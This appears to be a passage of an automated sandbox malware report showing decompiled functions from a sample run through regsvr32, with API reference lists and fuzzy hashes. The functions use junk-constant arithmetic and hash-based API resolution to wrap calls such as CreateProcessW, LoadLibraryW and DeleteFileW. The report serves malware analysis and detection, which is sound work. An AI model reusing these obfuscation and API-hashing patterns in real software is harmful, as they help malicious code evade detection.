                                                                                                                			E004846E0(void* __ecx, struct _PROCESS_INFORMATION* __edx, long _a8, intOrPtr _a12, struct _STARTUPINFOW* _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, WCHAR* _a40, intOrPtr _a44, int _a48, intOrPtr _a56, intOrPtr _a60, WCHAR* _a64, intOrPtr _a68) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t55;
                                                                                                                				int _t64;
                                                                                                                				signed int _t66;
                                                                                                                				struct _PROCESS_INFORMATION* _t72;
                                                                                                                
                                                                                                                				_push(_a68);
                                                                                                                				_t72 = __edx;
                                                                                                                				_push(_a64);
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(0);
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(0);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(0);
                                                                                                                				_push(__edx);
                                                                                                                				E00479E7D(_t55);
                                                                                                                				_v8 = 0x728488;
                                                                                                                				_v8 = _v8 + 0x86b5;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 + 0xe7c2;
                                                                                                                				_v8 = _v8 ^ 0x98526b3c;
                                                                                                                				_v16 = 0xdd86ac;
                                                                                                                				_v16 = _v16 | 0x9093749e;
                                                                                                                				_v16 = _v16 + 0x773d;
                                                                                                                				_v16 = _v16 ^ 0x90e3102d;
                                                                                                                				_v20 = 0xa04379;
                                                                                                                				_v20 = _v20 + 0xe8c2;
                                                                                                                				_v20 = _v20 ^ 0x00a70f96;
                                                                                                                				_v12 = 0x20815c;
                                                                                                                				_t66 = 0x4c;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xbbf973da;
                                                                                                                				_v12 = _v12 ^ 0xbbf5b48f;
                                                                                                                				E0048BFF0(0xac802c42, 0x58, _t66, _t66, 0xb43c22a7);
                                                                                                                				_t64 = CreateProcessW(_a64, _a40, 0, 0, _a48, _a8, 0, 0, _a16, _t72); // executed
                                                                                                                				return _t64;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,90E3102D,00000000,00000000,00000000), ref: 004847CA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction ID: 3e6d2b9ad4257f4161572df614002ca6a985e8045c1d39061bb698ca8d611e61
                                                                                                                • Opcode Fuzzy Hash: e0c050ce58c662d84963154c999a7e43a34ddb0fe429297838269ca99bc78211
                                                                                                                • Instruction Fuzzy Hash: 2B31E372900248BBDF559F96CD09CDEBF75FB89314F008148FA2462160D7769A60DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E0048BF1C(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, WCHAR* _a20, long _a24, long _a36, intOrPtr _a40) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t47;
                                                                                                                				void* _t55;
                                                                                                                				long _t60;
                                                                                                                
                                                                                                                				_push(_a40);
                                                                                                                				_t60 = __edx;
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00479E7D(_t47);
                                                                                                                				_v20 = 0x8eb723;
                                                                                                                				_v20 = _v20 + 0xdb15;
                                                                                                                				_v20 = _v20 ^ 0x00852a30;
                                                                                                                				_v16 = 0x113147;
                                                                                                                				_v16 = _v16 >> 0xc;
                                                                                                                				_v16 = _v16 << 0xa;
                                                                                                                				_v16 = _v16 ^ 0x0008263d;
                                                                                                                				_v12 = 0x276480;
                                                                                                                				_v12 = _v12 + 0x6f6f;
                                                                                                                				_v12 = _v12 | 0x7ba60f09;
                                                                                                                				_v12 = _v12 * 0x1e;
                                                                                                                				_v12 = _v12 ^ 0x7da9aca6;
                                                                                                                				_v8 = 0x62f42b;
                                                                                                                				_v8 = _v8 >> 0xc;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 >> 3;
                                                                                                                				_v8 = _v8 ^ 0x000dc6a5;
                                                                                                                				E0048BFF0(0xac802c42, 0xfa, __ecx, __ecx, 0xbf3d9e5c);
                                                                                                                				_t55 = CreateFileW(_a20, _a36, _a12, 0, _t60, _a24, 0); // executed
                                                                                                                				return _t55;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,00852A30,00000000,00050E56,?,00000000), ref: 0048BFE8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction ID: 0f8cd2037145af0413b987559e1755a2baf601c35c4f2b4e8f2d339172943c75
                                                                                                                • Opcode Fuzzy Hash: ac7f359d84ee74e8ca426aa0a0a8a4fd471f02a08522ffa2403057c705112b58
                                                                                                                • Instruction Fuzzy Hash: D421057280020DBBCF15DF96C9098DFBFB5FB84748F008198F925A2220D3B68A64DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00481B22(long __ecx, void* __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t44;
                                                                                                                				void* _t55;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t62;
                                                                                                                				long _t63;
                                                                                                                
                                                                                                                				_push(_a16);
                                                                                                                				_t62 = __edx;
                                                                                                                				_t63 = __ecx;
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E00479E7D(_t44);
                                                                                                                				_v12 = 0x22ab7;
                                                                                                                				_t57 = 0x25;
                                                                                                                				_v12 = _v12 * 0x37;
                                                                                                                				_v12 = _v12 / _t57;
                                                                                                                				_v12 = _v12 + 0xd1d9;
                                                                                                                				_v12 = _v12 ^ 0x00090b04;
                                                                                                                				_v16 = 0xc8cc57;
                                                                                                                				_v16 = _v16 >> 0x10;
                                                                                                                				_v16 = _v16 + 0xffff2520;
                                                                                                                				_v16 = _v16 ^ 0xfffe92e9;
                                                                                                                				_v20 = 0xc52a4b;
                                                                                                                				_v20 = _v20 | 0xae757bf4;
                                                                                                                				_v20 = _v20 ^ 0xaef18991;
                                                                                                                				_v8 = 0xf15120;
                                                                                                                				_v8 = _v8 ^ 0xeebb54a4;
                                                                                                                				_v8 = _v8 << 7;
                                                                                                                				_v8 = _v8 * 0x37;
                                                                                                                				_v8 = _v8 ^ 0xf39e7cda;
                                                                                                                				E0048BFF0(0xac802c42, 0xa7, _t57, _t57, 0x96a08a4a);
                                                                                                                				_t55 = RtlAllocateHeap(_t62, _t63, _a8); // executed
                                                                                                                				return _t55;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,005D2A08,FFFE92E9,?,?,?,?,?,?,?,?,00E39F9A,?), ref: 00481BE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction ID: 941a434d605e3301395054229e45974a89da03b59ce573fe712cc76169e10522
                                                                                                                • Opcode Fuzzy Hash: fa706059d1593490bdd0f8775815ca30a331f110814017c2da87bf38fa33e79e
                                                                                                                • Instruction Fuzzy Hash: F22132B5D00208FBDF05DFA5C94A8EEBBB5FB80314F10848AE914A6261D3B45B41DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E004866C2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t39;
                                                                                                                				intOrPtr* _t45;
                                                                                                                				void* _t46;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __edx;
                                                                                                                				E00479E7D(_t39);
                                                                                                                				_v12 = 0xe2acc8;
                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                				_v12 = _v12 + 0xbe17;
                                                                                                                				_v12 = _v12 ^ 0x0011993b;
                                                                                                                				_v20 = 0xf2f568;
                                                                                                                				_v20 = _v20 << 0xe;
                                                                                                                				_v20 = _v20 ^ 0xbd5142c5;
                                                                                                                				_v8 = 0x6d1128;
                                                                                                                				_v8 = _v8 + 0xffff2279;
                                                                                                                				_v8 = _v8 << 3;
                                                                                                                				_v8 = _v8 << 0xc;
                                                                                                                				_v8 = _v8 ^ 0x19de445b;
                                                                                                                				_v16 = 0xb26540;
                                                                                                                				_v16 = _v16 + 0xffff3889;
                                                                                                                				_v16 = _v16 ^ 0x00b459c6;
                                                                                                                				_t45 = E0048BFF0(0xee7aaf55, 0x326, __ecx, __ecx, 0x1d46c800);
                                                                                                                				_t46 =  *_t45(0, _a20, 0, _a8, _t51, __ecx, __edx, _a4, _a8, 0, 0, _a20, _a24, _a28, _a32); // executed
                                                                                                                				return _t46;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,060C7659,00000000,00B459C6,?), ref: 00486777
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction ID: 15db0576f14ac10faca90b9c37d6a4f62c36a04be1d9b6a9fe16f7bf63da4208
                                                                                                                • Opcode Fuzzy Hash: e4284d99b965fec255e6808552047daee7f3e91d1dd390b6355c9cd29ba91f34
                                                                                                                • Instruction Fuzzy Hash: 841144B2800208FBCF15DF95CC0A8DEBFB8EF95308F108198E92962210D3B58A64DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E0047FCB5(void* __ecx, WCHAR* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t36;
                                                                                                                				struct HINSTANCE__* _t47;
                                                                                                                				signed int _t49;
                                                                                                                				signed int _t50;
                                                                                                                				WCHAR* _t57;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t57 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E00479E7D(_t36);
                                                                                                                				_v20 = 0x4781cd;
                                                                                                                				_t49 = 7;
                                                                                                                				_v20 = _v20 / _t49;
                                                                                                                				_v20 = _v20 ^ 0x0004a997;
                                                                                                                				_v8 = 0x9f6121;
                                                                                                                				_v8 = _v8 | 0x04abbfea;
                                                                                                                				_v8 = _v8 ^ 0x44133d53;
                                                                                                                				_v8 = _v8 ^ 0x40a32c45;
                                                                                                                				_v16 = 0x791f5b;
                                                                                                                				_t50 = 0x6e;
                                                                                                                				_v16 = _v16 / _t50;
                                                                                                                				_v16 = _v16 ^ 0x000d135a;
                                                                                                                				_v12 = 0x90c5d0;
                                                                                                                				_v12 = _v12 ^ 0x2cafc93f;
                                                                                                                				_v12 = _v12 ^ 0x2c381e09;
                                                                                                                				E0048BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
                                                                                                                				_t47 = LoadLibraryW(_t57); // executed
                                                                                                                				return _t47;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0047FD58
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction ID: e648a7df2eb7d4e51e93d0b8cecb14ad259e342187a7125b8cbcae11588e336f
                                                                                                                • Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
                                                                                                                • Instruction Fuzzy Hash: 39112E71D00218EBDB18DFA5C84A8EEBBB5EB44308F10C58DE529A6251DBB56B148B91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00479EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				void* _t35;
                                                                                                                				int _t42;
                                                                                                                				WCHAR* _t46;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E00479E7D(_t35);
                                                                                                                				_v20 = 0xb0cce;
                                                                                                                				_v20 = _v20 + 0xffff00ee;
                                                                                                                				_v20 = _v20 ^ 0x0007bd05;
                                                                                                                				_v12 = 0x1e8fca;
                                                                                                                				_v12 = _v12 >> 6;
                                                                                                                				_v12 = _v12 << 8;
                                                                                                                				_v12 = _v12 + 0xffff1da9;
                                                                                                                				_v12 = _v12 ^ 0x0077171f;
                                                                                                                				_v16 = 0xc679b7;
                                                                                                                				_v16 = _v16 + 0x38bf;
                                                                                                                				_v16 = _v16 ^ 0x00cf762a;
                                                                                                                				_v8 = 0xa3ba51;
                                                                                                                				_v8 = _v8 ^ 0xa0d3ead1;
                                                                                                                				_v8 = _v8 + 0xe688;
                                                                                                                				_v8 = _v8 + 0xffff6d73;
                                                                                                                				_v8 = _v8 ^ 0xa079263d;
                                                                                                                				E0048BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
                                                                                                                				_t42 = DeleteFileW(_t46); // executed
                                                                                                                				return _t42;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 00479F51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction ID: c54df2c260711c14d493594267913c6cc6753dcc93b9580f272c6ce2e4e98e89
                                                                                                                • Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
                                                                                                                • Instruction Fuzzy Hash: 341148B1C01219EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B41B148F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0047BA9C(int _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				unsigned int _v20;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				_v20 = 0x6b4597;
                                                                                                                				_v20 = _v20 >> 2;
                                                                                                                				_v20 = _v20 ^ 0x00116e69;
                                                                                                                				_v16 = 0x7d3df7;
                                                                                                                				_v16 = _v16 << 3;
                                                                                                                				_v16 = _v16 ^ 0x03ee9fa4;
                                                                                                                				_v12 = 0x7e0c35;
                                                                                                                				_v12 = _v12 ^ 0xa2581e84;
                                                                                                                				_v12 = _v12 ^ 0xa22bc007;
                                                                                                                				_v8 = 0xada9ee;
                                                                                                                				_push(_t34);
                                                                                                                				_v8 = _v8 * 0x61;
                                                                                                                				_v8 = _v8 << 0xb;
                                                                                                                				_v8 = _v8 ^ 0x6b103fde;
                                                                                                                				E0048BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
                                                                                                                				ExitProcess(_a12);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00116E69), ref: 0047BB1D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.483924206.0000000000471000.00000020.00000800.00020000.00000000.sdmp, Offset: 00470000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.483918446.0000000000470000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000009.00000002.483968059.0000000000494000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_470000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction ID: 2f883274aac8a1d3a651d484edb0a9117643ae097bdff7acad312aaa3863e007
                                                                                                                • Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
                                                                                                                • Instruction Fuzzy Hash: 16010475D1120CEB8B04DFA5CA4A9DEBBB4FF04348F108599E821B7211D7B55B04CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%